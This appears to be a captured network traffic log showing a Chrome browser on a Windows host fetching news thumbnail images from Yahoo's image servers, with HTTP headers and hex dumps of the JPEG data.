                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1078INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="88364cc0-7f3c-11ef-9e6d-608bb5010780.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "bea398ad5c9a37547328cc541cf00687"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 14:59:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Request-Id: 8b4a4d1217cc1f8d9ac00ae8c571ed86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:41:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=1;cpu=0;start=2024-09-30T16:41:41.804Z;desc=hit,rtt;dur=96,content-info;desc="width=356,height=180,bytes=4280,owidth=3000,oheight=1688,obytes=224387,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 2357
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cld_id: 8b4a4d1217cc1f8d9ac00ae8c571ed86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 13180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC635INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 02 40 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 30 41 44 42 45 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 cf 00 06 00 03 00 00 00 00 00 00 61 63 73 70 41 50 50 4c 00 00 00 00 6e 6f 6e 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 41 44 42 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 63 70 72 74 00 00 00 fc 00 00 00 32 64 65 73 63 00 00 01 30 00 00 00 6b 77 74 70 74 00 00 01 9c 00 00 00 14 62 6b 70 74 00 00 01 b0 00 00 00 14 72 54 52 43 00 00 01 c4 00 00 00 0e 67 54 52 43 00 00 01 d4 00 00 00 0e 62 54 52 43 00 00 01 e4 00 00 00 0e 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: JFIF@ICC_PROFILE0ADBEmntrRGB XYZ acspAPPLnone-ADBEcprt2desc0kwtptbkptrTRCgTRCbTRCr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 00 b4 01 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 01 08 09 ff c4 00 45 10 00 01 03 03 03 02 04 03 05 06 03 05 07 05 00 00 01 00 02 03 04 05 11 06 12 21 31 41 07 13 51 61 14 22 a1 08 32 71 81 91 09 15 23 42 52 b1 24 c1 d1 16 33 62 72 f0 17 26 35 43 53 82 f1 54 64 73 83 a2 ff c4 00 1c 01 00 03 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 ff c4 00
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: CdE!1AQa"2q#BR$3br&5CSTds
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 67 03 09 04 a5 33 08 c6 50 0f e2 8c 81 d3 aa 5b 04 e5 88 e3 86 fd 51 b0 8e aa 8c e7 29 84 5d 44 4e 2e 09 6c 39 05 24 8e 70 c0 45 09 7a 2a 39 00 fb aa 2d 09 08 e9 5d 81 96 7d 52 d9 c2 e2 98 e7 ee fd 51 b5 49 b2 82 9b 8f bb f5 54 14 3a 37 97 13 ec 96 8f 6b 0d 01 dd 1b 79 53 96 27 2a 5e 26 ed 03 d9 46 58 6d ae 39 69 31 43 a9 1f 41 10 86 67 6f 68 e9 9e cb 8f 9f c4 df 6d f0 f2 3d 46 aa d6 54 24 82 7d 3d 17 2f ed 2b a2 79 7d 2a b7 bd 53 25 6b 5f 0d 30 31 b5 c7 04 fa 85 dd e3 f8 d2 39 39 fc 9f 6b d2 b9 d4 f3 d5 77 e3 87 ab 92 e5 ee 51 b8 c7 54 f4 5b 73 77 b2 69 26 e7 7b 20 08 80 29 69 28 02 f9 7c e7 08 03 88 ca 03 ad 61 ca 01 d3 20 f9 41 f5 4f e3 b2 ff 00 57 51 bc 78 1b e1 a8 a5 6b 35 1d d6 01 f1 b3 92 29 58 e6 fd d8 fb 91 ee 57 0f 93 cf b9 a8 ef f1 7c 7b bd d7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: g3P[Q)]DN.l9$pEz*9-]}RQIT:7kyS'*^&FXm9i1CAgohm=FT$}=/+y}*S%k_0199kwQT[swi&{ )i(|a AOWQxk5)XW|{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: ba 38 f1 db d6 1e 1e e9 c6 d8 a9 29 e2 9a 89 cd 89 80 00 fe a0 7b 9f 7e 57 25 b2 bb 24 d3 d0 76 2b 5b 6a ed 0f a5 a7 63 7c c9 01 03 1c 10 4f 70 94 3a ad f8 de fa 97 be 83 4f 50 d5 46 ea 1b 4d 38 8c 07 fc af 74 bf cc e7 75 cf 24 e3 d8 77 53 cb 7a 6d c3 3f bb 10 af aa 92 9d a5 f0 c9 fc 56 8e a3 d5 61 a7 45 c7 48 f8 ae d7 f7 bb 1e 71 70 f4 2a a2 6d d1 95 c2 f3 5c c7 f9 75 38 fc 42 43 db 64 28 af 14 e2 a4 3f 76 1c 5a 41 4e 27 2d 54 cd 96 d7 4f 75 b9 7c 75 64 61 f1 40 5a e9 83 9d c3 da 73 f2 e3 df 1f 92 d3 14 54 cd 5d c9 96 e2 e1 6c 7c e6 26 f1 83 f3 2d e3 2c b4 61 fb c2 29 87 f1 9c 31 d4 8d ad 6f 3d fd 3b 70 9b 2c a1 09 e3 74 bb 1f 4c dc b1 c0 fc 99 1c 3b 3c 7e a3 05 16 c4 7a 99 3a ba 28 25 f2 de f6 c6 5a 79 3b 8b 5c 08 ed c7 64 b6 af 43 1b d5 da a2 67 b4 c7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 8){~W%$v+[jc|Op:OPFM8tu$wSzm?VaEHqp*m\u8BCd(?vZAN'-TOu|uda@ZsT]l|&-,a)1o=;p,tL;<~z:(%Zy;\dCg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: c5 f3 9c f5 5a 42 ae 3e af 3d 89 5a 4b a6 56 6c c2 a2 ac 97 38 63 aa af 74 c9 b3 29 66 29 5c a5 54 84 7c f7 02 a2 dd 81 d9 54 e6 e3 69 c2 0a cd 8e 6b a4 6f 47 67 3e e9 cb a1 ea 0e b9 4a 7b fd 55 fb c3 93 44 ff 00 79 4b fd 47 f5 47 b8 3e 14 7b 40 18 c1 c2 e5 6f a7 1f 11 1d b0 81 a1 43 b1 95 64 33 5e 10 0a 36 50 32 82 97 63 89 86 0f 08 31 1d 3f 3d 50 1c f3 bd ca 01 4f 3c a0 39 e7 94 02 52 d5 63 d5 2a 08 be ad a7 b9 51 68 06 d6 b5 bd ca 57 b1 16 8d 01 71 a7 66 a1 8b e3 1d 88 36 b9 ce cf b0 25 61 e4 75 83 7f 1e 6f 91 e8 6d 49 e2 46 9c 36 da 7b 23 28 6d 75 ac 6c 43 7b e9 2a 63 a8 fc 06 01 04 1f d5 71 f4 f5 b0 ea a8 ef aa b6 88 9b 25 b2 60 e8 c8 3f 2f 42 cf c5 71 73 e3 bb d3 b7 0a 52 87 52 1a 50 24 df 92 01 6e 17 3c 8d e4 e9 0d 75 d7 f5 4d 2f 11 ca e6 e3 a6 16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ZB>=ZKVl8ct)f)\T|TikoGg>J{UDyKGG>{@oCd3^6P2c1?=PO<9Rc*QhWqf6%auomIF6{#(mulC{*cq%`?/BqsRRP$n<uM/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: dd 65 8e ab 79 c8 11 4f 13 c0 96 37 02 0f 3c 15 45 f3 53 da 7e bd cc 96 48 1a ec 19 1b 80 94 bb 16 69 35 33 08 03 2b 49 19 53 2a 9a 4c 83 23 52 ab 94 cd cd 7b 22 d8 f6 e3 dd 44 4d 20 da da 3a 57 03 50 f7 71 c8 6b 5a 49 29 ef 51 9d b5 3f 64 73 eb 9e 64 8a 9e 4d 81 b9 ce 16 17 2d 55 63 2a 51 83 7c ad 7b 87 0d ea b4 97 b6 98 df c3 05 d7 b7 13 70 d4 f5 92 67 2d 8e 43 1b 4f b0 5e bf 8d 8e b1 78 fe 45 df 22 0d a7 23 2b a2 b9 8a 24 03 27 d5 00 32 7d 50 03 27 d5 2a 03 27 d5 48 04 e0 05 40 01 c2 01 66 3b a7 08 05 10 0b 20 01 6e 50 70 1c ce 9c a1 52 6c 4f 86 71 e7 1f 55 01 67 a8 ba 02 0f cc 13 d3 6b 94 44 54 d7 97 13 cf 54 98 5b da 2e 5a 82 f7 9c ad 22 46 8a 4e 47 ba b8 0f 22 71 70 03 0a 69 43 d8 e3 24 37 85 9d 54 19 f1 9f 44 e7 4d 29 29 0e 1a 53 95 1a 35 92 4c 9e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: eyO7<ES~Hi53+IS*L#R{"DM :WPqkZI)Q?dsdM-Uc*Q|{pg-CO^xE"#+$'2}P'*'H@f; nPpRlOqUgkDTT[.Z"FNG"qpiC$7TDM))S5L
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 4f da e8 98 48 c8 e8 89 7b 54 8b a6 8e a7 f2 75 05 04 85 a3 8a 86 76 f7 58 79 53 71 af 17 55 e9 4d 35 14 54 54 af a9 2e 3f 19 58 08 3b 47 cd 1c 7e 80 fb f2 bc 9b c5 ba f7 6f 2c 98 a2 b5 3e 9a 06 86 aa aa d0 f9 21 9a 47 99 5c d0 f2 43 9e 7b f2 8c 7c 5c 72 f9 3e 1f 2b 2c 77 a7 9c 35 25 df c4 78 2e 73 51 9b 74 b1 18 5e 5b e6 45 10 3b bd c1 2b 7c 7c 3e 09 fe a2 cf cd e7 96 e8 7b 47 88 da 8e 8e a0 52 6a fa 97 4d 4a ef 91 de 64 40 3d a7 d4 e3 19 58 f9 3e 26 39 75 c3 f2 3c 5f a9 f3 cf fc c9 3d 34 ea 7d 43 7e f8 f8 63 7b a9 29 d8 5a 66 3d 0b 9d d8 7a f4 59 5c 2f 0c ed d3 ed f7 fb 5a ed f7 e9 6d 86 6a 36 bf 31 ee 38 0b 2b 96 da 63 8f a9 3a eb 93 aa 83 9d 23 b7 6e e9 ec b3 6d 35 50 73 9c 3b f3 4e 23 40 24 2d 61 6f aa d7 06 1c 93 b1 44 ae 3f 2f 45 b6 35 cd 93 9e 4b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: OH{TuvXySqUM5TT.?X;G~o,>!G\C{|\r>+,w5%x.sQt^[E;+||>{GRjMJd@=X>&9u<_=4}C~c{)Zf=zY\/Zmj618+c:#nm5Ps;N#@$-aoD?/E5K
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 92 46 04 65 38 24 db a9 28 10 54 10 40 80 29 39 54 52 69 c4 18 89 44 d1 72 55 c2 2f 13 b2 70 56 80 f6 38 83 f1 84 1c 9b 28 28 c1 08 52 be b0 88 0c 14 c1 46 a0 0c d5 50 17 8f ba 60 e6 37 06 f5 41 c2 80 8c a8 6b 89 5f 35 b8 e9 ca 9c ae 97 2e 84 2e 07 b2 9d 6d ac 9b 75 ae c1 1c 27 31 4d c4 ea 09 08 da e4 7c 89 8a 46 1a f1 18 ee a6 9c c5 39 a7 2e ad fd f9 6e f9 ba d4 31 9f a9 c2 cb 39 d1 e3 3b 7b 17 4b 68 5d 31 57 a3 bc fb fd d2 2a 66 4b 19 64 6d 7b 01 25 ce e8 00 24 67 27 1f 80 e7 95 c9 95 ed f4 3e 17 91 f6 66 a9 29 2d 55 3a 66 df 25 35 6d ba 9a b6 92 a6 48 9b 05 46 ef 9c c6 d0 43 58 78 e4 70 dc 7a 06 f7 ca cf 2c 23 ba 78 d8 e5 df 16 6c 5f 5d d9 2e ec 65 54 d2 e9 f6 4b e6 d6 07 b4 35 a7 e4 88 00 01 e5 bc ac 3b db 93 c8 f1 f5 de d8 f5 e4 5e e9 6b 9c ea 3b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Fe8$(T@)9TRiDrU/pV8((RFP`7Ak_5..mu'1M|F9.n19;{Kh]1W*fKdm{%$g'>f)-U:f%5mHFCXxpz,#xl_].eTK5;^k;}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 4e fe 26 17 34 bd 76 eb a8 8a a9 e5 93 99 4e ef 44 4b bb a2 ca 1a 39 c0 82 31 d1 52 6c d1 9d 40 23 f0 56 57 2d 9b 3b 70 3c a1 25 a1 04 bb 24 22 4d ab 13 8c e0 0c 35 0d 36 45 ee 20 03 b7 a2 11 95 ec 97 c4 ba 32 02 0b 67 34 75 26 67 ec 53 57 8d 59 2c 8c 22 a3 2b 2c e7 4d e3 6b f0 75 b1 1d 55 44 c9 1d b7 73 b0 0f a7 0a bc 6f 97 37 97 f0 b7 78 f7 f6 49 a0 f1 0a da 7c 41 f0 ec 4e 2f 6c 69 7d c6 dd 1b bf df 38 75 31 b4 75 77 f7 5e 9c dc c7 6e 4f 12 78 f9 5f 5e 67 9d b4 1f 84 9a 72 79 1d 2e bc f8 ea 60 d9 4c 6d a4 70 f2 9e 1c de a5 df 86 47 18 5e 27 93 f5 39 bd 62 fd 7b f4 e7 fd 3d e0 f2 f8 3f 71 cf fc 58 b4 2d 4d f6 62 d2 17 7a 1f 88 d2 55 75 14 b5 4f 1b 99 be 53 23 5f ec 73 d3 f2 f5 58 71 f9 bc d7 fe 1d ff 00 56 ff 00 a7 7e 16 bf a6 9e af 37 ea 8d 27 7e d1 d7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: N&4vNDK91Rl@#VW-;p<%$"M56E 2g4u&gSWY,"+,MkuUDso7xI|AN/li}8u1uw^nOx_^gry.`LmpG^'9b{=?qX-MbzUuOS#_sXqV~7'~
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 0e 5d 9a 0c 2e 21 2d 06 69 a8 19 97 bd 4d c7 47 ec 84 b2 e8 cd 4b ad af b4 f6 0d 25 63 ab ba 5c 6a df b6 38 29 a3 2e 3f 89 23 80 3d ce 14 d8 b9 5f 42 3e ce 7f b2 e2 d1 0c 14 fa 97 c7 ca b3 57 50 4e f6 d9 69 df b6 38 c7 a3 de df 99 e7 38 c9 04 0e 3b a5 a1 6c d3 de ba 2b c3 5f 0f fc 39 b7 45 6a d1 3a 52 db 69 a6 85 bb 58 da 6a 76 46 71 ee 40 c9 fc d3 91 95 ab 1c b5 00 0e 00 55 30 1b 47 ba 73 9c 61 12 68 41 64 71 7e 39 c2 b6 b8 ff 00 15 91 f2 cb ed 1f ab 9b a9 7c 7b bb 3b cd de ca 77 7c 2b 5d e9 b4 1e 3e ab e3 7e a1 c9 fd 75 8f e8 9f 07 c2 fd af e8 fb b9 f3 ff 00 eb 28 ad 84 0a d3 1b 46 37 15 d1 33 98 bf 21 cb 0d da cd 3c 4a d2 66 ae 7f 8c a2 68 f3 58 dc b9 be a1 69 8f 36 dc bc 9c 2c bc c3 2b 33 1b da 5a 47 63 c2 ea c3 39 58 5e 3b 08 39 af 61 e0 2d 77 b6 7e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ].!-iMGK%c\j8).?#=_B>WPNi88;l+_9Ej:RiXjvFq@U0GsahAdq~9|{;w|+]>~u(F73!<JfhXi6,+3ZGc9X^;9a-w~


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    56192.168.2.44982087.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC522OUTGET /uu/api/res/1.2/d2s6nYW_YMTX2VM1IGOKBQ--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/the_hill_articles_341/05f082c3610c0f639765aa4d2e67e189.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1084INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="05f082c3610c0f639765aa4d2e67e189.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "f9039c095c9851d2a5bafe97c450bc48"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expiration: expiry-date="Fri, 22 Nov 2024 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 25 May 2024 14:55:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:02:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=1;start=2024-09-30T16:02:12.555Z;desc=hit,rtt;dur=88,content-info;desc="width=536,height=284,bytes=9346,owidth=900,oheight=505,obytes=46729,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 4726
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-width: 536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-height: 284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 32733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC126INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: JFIFCC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 1c 02 18 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 05 06 07 04 08 09 ff c4 00 48 10 00 01 03 03 03 02 04 03 05 06 04 04 03 07 05 00 01 00 02 03 04 05 11 06 12 21 31 41 07 13 51 61 22 71 81 14 32 42 91 a1 08 15 23 52 b1 c1 62 d1 e1 f0 16 24 43 72 33 82 f1 25 34 63 73 92 a2 c2 17 26 44 54 b2 ff c4 00 1b 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 00 03 04 05 06 07 ff c4 00 2e 11 00 02 02 02 03 00 02 02 02 01 03 04 03 01 00 00 00 01 02 11 04 21 03 12 31 05 13 14 41 22 51 06 15 23 32 16 24 33 42 34 43 61 71 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f1 a7 97 ee bd 65 19 a8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: H!1AQa"q2B#Rb$Cr3%4cs&DT.!1A"Q#2$3B4Caq?e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 7b 9a d6 b5 b9 4b 91 a8 d2 0a 4e c8 ef 06 e0 7b 34 fc f3 00 72 49 c7 e6 a9 c6 4f d0 f2 ab 47 46 8e bf de 6e 5a 9e b6 8a 78 5c 69 9a ec b3 78 fe 8a f7 90 96 98 91 b7 e1 3f ff 00 0c 5a 62 bb cb 75 ac 6c 6d 6c 87 71 39 c6 4a e1 7c 9f ca f0 e2 ed 1d 2c 6c 47 cf ba 39 24 97 48 d8 aa 24 b9 b6 82 27 c8 3f eb 4f f7 1a 7d bf df 65 e2 b2 ff 00 c8 32 32 ad 23 b3 8b 86 97 a4 35 cb c6 c1 46 e7 8a 3f e2 11 c3 44 71 38 34 fc 8b 72 17 17 b4 9e db 3a 8a 28 16 9f 1a 1b 7b 8c c5 5d 53 e4 6f 7b 5a c2 5e 59 d7 39 c6 72 09 e9 c6 42 5d 91 a5 47 6c d7 ed 42 60 74 96 8b c4 ef 23 05 bb ce 43 bf 5e 11 49 94 d1 60 d2 5e 2e dd 25 b7 7d a2 5f 30 4b 4c ef e3 46 4e 4b 41 20 67 e4 3f 3c 82 91 b6 bc 2e e8 a8 d1 ea 6b ed 1a be 28 20 af 6f 93 51 33 37 c7 56 c6 e4 38 ff 00 29 1f d3 94 eb 33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {KN{4rIOGFnZx\ix?Zbulmlq9J|,lG9$H$'?O}e22#5F?Dq84r:({]So{Z^Y9rB]GlB`t#C^I`^.%}_0KLFNKA g?<.k( oQ37V8)3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: d0 7d 20 00 7a a2 b9 49 f4 87 b4 7a a6 fb 89 f4 8d ed f5 28 3e 64 4f a0 1b 42 5f b5 13 e8 06 d0 a7 da 89 f4 03 68 f5 53 ed 15 f0 a1 1b 42 3f 72 02 e2 4c 1e 58 43 ed 41 fa 50 8d be ea 7d 88 3f 52 11 b7 dd 4f b2 c9 f5 a4 16 72 a7 64 1a a1 1f 44 8d 91 2b 0b 6f ba 16 06 ac da b6 05 c8 b3 a5 63 80 63 80 54 b0 07 b7 dd 14 3c 50 7b 7d d3 a1 82 42 c8 05 2c 82 76 37 d1 4b 20 36 37 d1 4b 20 87 b3 a7 29 88 30 e6 e3 a2 36 2b d0 de cf 65 3b 31 02 c0 53 b3 20 30 3d 14 b6 40 9c 06 d4 53 64 43 27 aa 72 01 0d 87 41 77 ca 29 56 c4 ea 3c 26 92 2c 08 dd 85 7a e5 68 0d 24 77 d0 ea db ed bd e0 c3 5c f2 d1 d1 a4 f4 4f 0c a6 98 ae 36 59 e8 fc 5f d4 34 cc c4 98 7f be 56 a5 96 e8 1f 45 8b ad f1 9a ff 00 51 17 94 d8 c0 f7 2e 55 cb 2d 8c b8 28 a5 de 35 15 ce ee ed d5 95 12 3c 9e c5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: } zIz(>dOB_hSB?rLXCAP}?ROrdD+occT<P{}B,v7K 67K )06+e;1S 0=@SdC'rAw)V<&,zh$w\O6Y_4VEQ.U-(5<
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:58 UTC1300INData Raw: 32 a2 8d 90 47 97 ee 9b ad 10 7a 92 06 4d 3b 21 7f e2 76 33 e8 ac 82 12 4c da e9 62 d3 7a 62 cc c7 56 b5 ac 60 cf c4 46 72 ae 8c 0a db 1a 7d af 49 eb 1a 72 fa 69 a2 73 9c 32 1c dc 65 3a e3 4c 96 5d 7c 32 f0 fe 96 c5 4e fd cc 64 83 d7 a6 73 fe ff 00 54 eb 1d 7a 1b 33 0f 16 b4 b5 c6 aa ff 00 be 82 89 f2 75 df b4 67 1d 31 fd 0a a3 9b 8e bc 0a 91 9e d4 e9 7b ed 24 7e 74 d6 f9 5a c1 dc 85 4a 84 83 d9 11 0e 6b 98 e2 d7 0c 10 84 a2 d7 a4 b0 80 c9 c2 55 b2 59 d2 fa 37 c7 19 73 d1 51 b0 36 71 a1 41 52 02 04 b1 19 ca 34 4b b1 bc e7 d9 4a 22 0c 1c f6 52 80 1a 04 10 a1 04 a8 41 95 08 25 06 0b 11 e5 fb a5 14 db 83 31 dd 73 53 a3 7d 0b db ee 99 3b 0a 88 36 fb a1 63 58 36 fb a9 62 bd 83 6f ba 29 91 46 c1 b7 dd 35 8c 95 03 05 46 c2 12 96 06 ac 43 db bb 1c a2 a5 40 ea 21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2GzM;!v3LbzbV`Fr}Iris2e:L]|2NdsTz3ug1{$~tZJkUY7sQ6qAR4KJ"RA%1sS};6cX6bo)F5FC@!
